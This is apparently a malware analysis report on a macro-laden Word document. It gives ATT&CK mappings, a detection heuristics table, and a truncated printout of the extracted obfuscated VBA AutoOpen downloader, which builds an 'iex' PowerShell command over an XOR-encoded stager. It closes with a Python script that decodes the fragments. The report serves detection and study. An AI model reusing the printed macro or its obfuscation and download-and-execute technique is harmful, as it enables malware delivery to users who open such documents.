Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample is a Word document carrying a VBA project that runs on open (AutoOpen) and launches PowerShell through Shell(), which is the critical finding. The recovered source is padded with junk arithmetic loops over undeclared variables (harmless under On Error Resume Next) and assembles its command line from short string fragments. Read in order, the fragments spell out an obfuscated PowerShell invocation: `$VerbosePreference.ToString()[1,3]+'x' -join ''` evaluates to `iex` (Invoke-Expression) under the default preference value "SilentlyContinue", and it is applied to a `-join` of a long integer array, i.e. an encoded second-stage script. That layout is the usual shape of a macro downloader that fetches and executes a secondary payload; the array's decoding expression falls in the truncated part of the preview, so the stage-two URLs are not visible in this report. The only URL extracted, http://schemas.openxmlformats.org/drawingml/2006/main, is the DrawingML XML namespace URI and carries no network indicator.
Heuristics (6)

| Heuristic | Severity | Rule ID | Description |
|---|---|---|---|
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (3 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). |
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16309 bytes | e65e3ab6b679dc553d352cbb93f33bf2ace5183e45a990a2ec0195b8571cd63d |

Preview: first 1,000 lines of the extracted script (the report truncates the listing). olevba has written two modules into one file: the document class module iBbzpLjzG (VB_Base = "1Normal.ThisDocument", VB_PredeclaredId = True) and the standard module iOGGmiXdOThjD. Every For Each loop operates on undeclared variables and is dead weight; only the string assignments between the loops contribute to the command that is eventually executed.

```vba
Attribute VB_Name = "iBbzpLjzG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "iOGGmiXdOThjD"
Function bEihGNi()
    On Error Resume Next
    For Each MTHpZS In LKzbCz
        FQkcL = 43779 + Atn(89881) / 75995 / Round(56265) / 18858 / CInt(VimoSC)
        kTNpDF = (lwCZo * 80378 + 59223 * CInt(PLztWP - CDbl(5332)) * 64602 * Oct(48123))
        AAGjm = lcbsw = aUOSb
    Next
    YaYbBRBoLC = "Ow" + "erSHe" + "ll &( " + "$vERBos" + "epRE" + "fErEnCE.ToS" + "TriNG()[1,3]+'" + "x'-JoI" + "N'')( -j" + "oIn"
    For Each LEMjn In Nmsul
        SNuLLH = 55227 + Atn(65223) / 25067 / Round(56541) / 22708 / CInt(wRYHj)
        iEohcJ = (Yojlwo * 53892 + 2172 * CInt(JKhIR - CDbl(18498)) * 11813 * Oct(44156))
        VcYOZ = ACziWj = JffiP
    Next
    cYPPGvu = " (( " + "26 , 81 , 115 ," + "127, 113 ,125,8" + "7, 30" + " , 3 , 30 ,"
    For Each JPFlw In ziZJAB
        TJzXA = 75808 + Atn(12725) / 19142 / Round(63655) / 96529 / CInt(KStHX)
        mtiEva = (MHwwn * 47351 + 77113 * CInt(YPcCz - CDbl(33912)) * 39932 * Oct(99940))
        hRFOj = ThLBYb = McjOB
    Next
    lEhIVZiYTn = " 80, " + "91 ,73 ,19,81" + " , 92" + " ,84, 91 " + ",93 , " + "74 ,30,7" + "6 , 9" + "5 , 80 , "
    For Each UDfZdP In XPiDCz
        BqjTh = 16056 + Atn(1520) / 82831 / Round(25211) / 1412 / CInt(YuoqT)
        kQRjN = (tEaaXm * 67480 + 16985 * CInt(GhMpwM - CDbl(22465)) * 41579 * Oct(57058))
        tVAlFC = hcSuA = unlPc
    Next
    jAoMm = "90, 81, 83 , 5 " + ", 26 , 83, 1" + "24 ,8" + "7,68 ,83 ,121, " + "30,3,30,80 " + ", 91 ,73"
    bEihGNi = YaYbBRBoLC + cYPPGvu + lEhIVZiYTn + jAoMm
End Function
Function mPNjKEizT()
    On Error Resume Next
    For Each sSVXQ In GqvGU
        RLWXmw = 92176 + Atn(89424) / 94627 / Round(84436) / 53395 / CInt(zchrN)
        BNwjP = (zNCTdE * 22757 + 88610 * CInt(TtAMWa - CDbl(50091)) * 85735 * Oct(94103))
        ikmZc = BjYLnM = iLqGLZ
    Next
    jhmWUI = " ,19 , 8" + "1, 92,84 , 91, " + "93" + ", 74, 30, 1"
    For Each ZibXni In GEVAjU
        UoGzat = 83856 + Atn(46649) / 60863 / Round(5207) / 4600 / CInt(ctwwal)
        THpXO = (njpHj * 62947 + 68336 * CInt(NMzUd - CDbl(34859)) * 73627 * Oct(82476))
        tYndf = auQXNB = mKdwAt
    Next
    dthCzVjOS = "09" + ", 71" + " , " + "77 , 74," + " 91 , 83, 16" + " ,1" + "12 " + ", 91,74,16 , "
    For Each oOMSJ In RVamr
        MwEols = 43715 + Atn(67793) / 52096 / Round(77850) / 34688 / CInt(oTljU)
        RtztFR = (CmACOO * 40395 + 71459 * CInt(wqLCN - CDbl(87971)) * 9676 * Oct(58850))
        VzdJY = loXli = AqjliU
    Next
    GdXVWDncKdQ = "105" + " , " + "91 , " + "92" + ", 125 " + ",82 ,87 , 91 ,8" + "0,74 ,5,26 ,8" + "4 ,125"
    For Each tNjQa In jCuwzi
        LAGalW = 14204 + Atn(66249) / 68836 / Round(84835) / 35217 / CInt(pRNWlE)
        iYRSJ = (IrRBi * 20063 + 99836 * CInt(NuLOH - CDbl(23738)) * 50832 * Oct(79390))
        EvXNE = wYjwXn = WAcRLT
    Next
    UtdTDGSElUB = ",10" + "0,82,119 ,127" + ",30 , 3 , " + "30,2" + "5, 86, 74 " + ",74,78 , " + "4, 17, 17, 74" + ", 70,84 , 89"
    For Each JTdwN In SOYKlq
        DoHjvU = 64719 + Atn(27919) / 62849 / Round(89777) / 57020 / CInt(wFNCwz)
        GNvDp = (cibPor * 57938 + 63910 * CInt(hJirMH - CDbl(20039)) * 16401 * Oct(66411))
        swTHj = wBRjb = JhocW
    Next
    NFcUwM = ",95, 73" + " ,92, 83 ," + " 16, 93 , 81, " + "83,17,108 ," + "82 ,9"
    For Each assqp In zVLAw
        BXBnR = 75723 + Atn(20615) / 97715 / Round(4936) / 86927 / CInt(ORqnt)
        klcFu = (IDwZUq * 6396 + 46120 * CInt(nWIHk - CDbl(78355)) * 37327 * Oct(90477))
        LzSXzw = OjrtH = zSHow
    Next
    BwFtmXA = "0 , 118, 11 , " + "89" + ",70 " + ", 17" + ",126," + "86 ,74,74 , 78 " + ",4,"
    For Each ckFzDG In LiRTW
        ATzjlj = 66172 + Atn(4993) / 1088 / Round(75114) / 32047 / CInt(TsCwv)
        zvsItR = (KAkmz * 37853 + 40183 * CInt(dcQjG - CDbl(43469)) * 61324 * Oct(7071))
        KzQubm = rbMtQ = IwVjm
    Next
    BAqkwfBfCrD = " 17, 17 ," + " 73,73 , 73," + " 1" + "6 ,7" + "7, 74 ," + " 81, 82, " + "88, 95"
    For Each PiNOv In GbGHU
        Fpdtq = 24782 + Atn(26127) / 1043 / Round(64554) / 76742 / CInt(TpCjq)
        KWkED = (KOfKt * 69750 + 40977 * CInt(LtaYT - CDbl(18663)) * 2142 * Oct(39868))
        DNmXb = Kdaijc = i
' ... (truncated by the report)
```
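The string fragments in the macros.bas preview can be reassembled and the integer array decoded without running the document. The Python below is an added worked example, not part of the analyzer's output or the sample: it copies the string-assembly statements from the preview (the junk loops are dropped, and since the second function's final concatenation is in the truncated part, declaration order is assumed to be assembly order), joins the double-quoted literals exactly as the macro's `+` chains would, pulls the integers after the `((`, and brute-forces a single-byte XOR key because the `-bxor` tail that would name the key is not visible in the report. The key is therefore inferred by ranking candidate plaintexts, not read from the page. It also evaluates the `$VerbosePreference` trick to show why the call resolves to `iex`. The keyword list and the scoring weights are this example's own choices.

```python
import re

# Constructed input: the string-assembly statements copied from the macros.bas
# preview in this report. The junk loops between them are omitted; the second
# function's final concatenation is truncated in the preview, so declaration
# order is assumed to be assembly order.
VBA_FRAGMENTS = '''
YaYbBRBoLC = "Ow" + "erSHe" + "ll &( " + "$vERBos" + "epRE" + "fErEnCE.ToS" + "TriNG()[1,3]+'" + "x'-JoI" + "N'')( -j" + "oIn"
cYPPGvu = " (( " + "26 , 81 , 115 ," + "127, 113 ,125,8" + "7, 30" + " , 3 , 30 ,"
lEhIVZiYTn = " 80, " + "91 ,73 ,19,81" + " , 92" + " ,84, 91 " + ",93 , " + "74 ,30,7" + "6 , 9" + "5 , 80 , "
jAoMm = "90, 81, 83 , 5 " + ", 26 , 83, 1" + "24 ,8" + "7,68 ,83 ,121, " + "30,3,30,80 " + ", 91 ,73"
jhmWUI = " ,19 , 8" + "1, 92,84 , 91, " + "93" + ", 74, 30, 1"
dthCzVjOS = "09" + ", 71" + " , " + "77 , 74," + " 91 , 83, 16" + " ,1" + "12 " + ", 91,74,16 , "
GdXVWDncKdQ = "105" + " , " + "91 , " + "92" + ", 125 " + ",82 ,87 , 91 ,8" + "0,74 ,5,26 ,8" + "4 ,125"
'''

# Tokens a decoded PowerShell stager is likely to contain. Used only to rank
# candidate XOR keys; this example's own list, not the analyzer's.
KEYWORDS = ("new-object", "webclient", "http", "invoke", "downloadfile", "iex")


def assemble_command(vba_source: str) -> str:
    """Concatenate every double-quoted VBA literal in source order.

    This mirrors what the macro's '+' chains do at run time, including literals
    that split one number across two fragments ("1" + "09" -> "109").
    """
    return "".join(re.findall(r'"([^"]*)"', vba_source))


def extract_char_codes(command: str) -> list[int]:
    """Pull the integer array that follows the '((' opening the -join operand."""
    _, _, array_part = command.partition("((")
    return [int(n) for n in re.findall(r"\d+", array_part)]


def xor_decode(values: list[int], key: int) -> str:
    return "".join(chr(v ^ key) for v in values)


def plausibility(text: str) -> int:
    """Score a candidate plaintext: ASCII letters and spaces score, control and
    non-ASCII bytes cost, PowerShell tokens earn a large bonus. Explicit ordinal
    ranges are used so Latin-1 letters produced by wrong keys do not count."""
    score = 0
    for ch in text:
        o = ord(ch)
        if 65 <= o <= 90 or 97 <= o <= 122:
            score += 2
        elif 48 <= o <= 57 or o == 32:
            score += 1
        elif not 32 <= o <= 126:
            score -= 10
    low = text.lower()
    score += 50 * sum(low.count(k) for k in KEYWORDS)
    return score


def recover_xor_key(values: list[int]) -> int:
    """Brute-force the single-byte XOR key (the '-bxor N' the preview truncates)
    by choosing the key whose decoding looks most like PowerShell."""
    return max(range(256), key=lambda k: plausibility(xor_decode(values, k)))


def resolve_iex_alias(verbose_preference: str = "SilentlyContinue") -> str:
    """What $VerbosePreference.ToString()[1,3]+'x' -join '' yields under the
    default preference value: characters 1 and 3 of 'SilentlyContinue' plus 'x'."""
    return verbose_preference[1] + verbose_preference[3] + "x"


if __name__ == "__main__":
    cmd = assemble_command(VBA_FRAGMENTS)
    codes = extract_char_codes(cmd)
    key = recover_xor_key(codes)
    print("assembled :", cmd[:70], "...")
    print("iex alias :", resolve_iex_alias())
    print("xor key   :", key)
    print("decoded   :", xor_decode(codes, key))
```

The decoded prefix shows a `New-Object System.Net.WebClient` being stored in a variable, which is the downloader behaviour the verdict is based on; the remaining fragments in the preview (NFcUwM onwards) continue the same array and can be appended to `VBA_FRAGMENTS` to recover more of the stager. Because the key is inferred, an analyst should confirm it against the `-bxor` operand in the full extracted source before treating any decoded URL as an indicator.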